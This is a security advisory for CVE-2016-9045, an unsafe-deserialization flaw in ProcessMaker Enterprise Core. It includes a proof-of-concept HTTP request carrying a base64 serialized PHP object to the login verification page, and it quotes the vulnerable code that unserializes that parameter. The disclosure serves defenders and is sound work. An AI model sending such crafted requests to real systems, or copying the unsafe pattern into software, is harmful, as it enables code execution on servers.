ProcessMaker Enterprise Core Code Execution Vulnerability(CVE-2016-9045)

### Summary A code execution vulnerability exists in ProcessMarker Enterprise Core 3.0.1.7-community. A specially crafted web request can cause unsafe deserialization potentially resulting in PHP code being executed. An attacker can send a crafted web parameter to trigger this vulnerability. ### Tested Versions ProcessMaker Enterprise Core 3.0.1.7-community ### Product URLs https://www.processmaker.com/community-2 ### CVSSv3 Score 8.8 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H ### CWE CWE-502 - Deserialization of Untrusted Data ### Details It was discovered that the application deserialized untrusted data without properly limiting or validating the incoming data type. The following Proof Of Concept request demonstrate the issue: ``` GET /sysworkflow/en/neoclassic/login/sysLoginVerify.php? d=TzoxNToiTXlTUUxDb25uZWN0aW9uIjoyOntzOjY6IgAqAGRzbiI7TjtzOjg6IgAqAGZsYWdzIjtpOjA7fQ== HTTP/1.1 Host: 192.168.56.101 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://192.168.56.101/sysworkflow/en/neoclassic/login/login? u=%2Fsysworkflow%2Fen%2Fneoclassic%2Fadmin%2FpmLogo Connection: close ``` The following code was found to be responsible for unsafe deserialization: ``` 26 if (array_key_exists("d", $_GET)) { 27 $_POST = unserialize(base64_decode($_GET["d"])); 28 29 } 30 31 if (! isset ($_POST)) { 32 G::header('location: /sys/' . $lang . '/' . SYS_SKIN . '/' . 'login/login'); 33 } 34 if (isset($_SESSION['sysLogin'])) { 35 $_POST['form'] = $_SESSION['sysLogin']; 36 } 37 38 require_once 'authentication.php'; 39 ``` ### Mitigation Restrict access to known, trusted users and hosts. ### Timeline * 2016-04-28 - Vendor Disclosure * 2017-07-19 - Public Release ### CREDIT * Discovered by Jerzy Kramarz of Portcullis Computer Security Limited.